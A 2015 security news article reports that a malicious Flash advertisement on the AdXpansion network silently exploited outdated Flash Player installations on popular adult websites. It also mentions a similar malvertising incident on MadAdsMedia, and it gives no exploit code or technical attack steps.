Exploit targets Flash versions earlier than 17.0.0.134

May 9, 2015 05:48 GMT  ·  By

A malicious advertiser managed to insert a bad ad into the AdXpansion ad network, delivering an exploit for Flash Player to visitors of major adult content websites.

Users do not have to click anywhere on the page to get infected; just loading it in a browser with a vulnerable version of Flash Player is sufficient to receive the payload, which could be anything from a banking Trojan to botnet malware.

Users with outdated Flash Player exposed

The rogue Flash advertisement includes the exploit code, which is a more direct approach since the more commonly seen method for infecting computers via malvertising supposes redirecting the visitor to a domain hosting an exploit kit, which in turn served the exploit for the vulnerable component on the computer.

Researchers at Malwarebytes tracked down the campaign affecting AdXpansion and identified dozens of websites that served the malicious code in this drive-by attack.

“The advert displaying sexual enhancement drugs, is loaded with malicious code that will immediately attempt to exploit the visitor, regardless of whether they click on the ad or not,” Jerome Segura says.

There are no statistics about the amount of victims, but millions of users may be impacted, considering that the websites receive a combined number of more than 250 million visits on a monthly basis.

Some of the websites that received the rogue advert are DrTuber (60.2 million monthly visits), NuVid (46.5 million visits) and HardSexTube (43.7 million users per month).

Exploit code could pass as legitimate

The exploit is for versions of Flash prior to 17.0.0.134, which was released in March to address a total of 11 vulnerabilities.

Segura says that the attackers relied on ActionScript3 code with deceiving module names to evade detection and that the structure could easily make it pass as legitimate.

Malwarebytes alerted AdXpansion and received a reply that the activity of the malicious advertiser has been stopped.

Malvertising has become a real problem lately as the reports of this kind of incidents have increased.

In a blog post on Thursday, security company Trend Micro announced that another ad network, MadAdsMedia, has been leveraged to distribute an exploit for a security hole in Flash Player earlier than 17.0.0.169.

In this case, the attackers managed to compromise company server storing a JavaScript library that indicated the ads to be displayed on a publisher’s location. The code of the library was modified to divert the connection to a domain hosting Nuclear exploit kit.